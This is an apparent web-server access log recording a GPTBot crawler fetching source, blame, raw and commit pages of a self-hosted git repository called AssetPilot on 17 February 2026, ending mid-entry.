GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11536] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11548] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11537] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10009] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" -[17/Feb/2026:13:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" -[17/Feb/2026:13:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" -[17/Feb/2026:13:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15262] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" -[17/Feb/2026:13:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 21523] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:32 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10423] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 16639] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" -[17/Feb/2026:13:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13369] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" -[17/Feb/2026:13:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9961] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" -[17/Feb/2026:13:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13510] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" -[17/Feb/2026:13:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 23753] [Gzip 11.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" -[17/Feb/2026:13:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" -[17/Feb/2026:13:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" -[17/Feb/2026:13:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:13:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 74.7.227.38] [Length 10163] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" -[17/Feb/2026:13:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 17039] [Gzip 8.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13131] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13181] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:13:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14274] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16599] [Gzip 8.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10427] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10421] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstatic" [Client 74.7.227.38] [Length 49852] [Gzip 10.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" -[17/Feb/2026:13:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15306] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" -[17/Feb/2026:13:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 18297] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 265999] [Gzip 14.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13341] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 16607] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14171] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 193781] [Gzip 19.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17362] [Gzip 4.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=ignore-all" -[17/Feb/2026:13:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 56836] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-change" 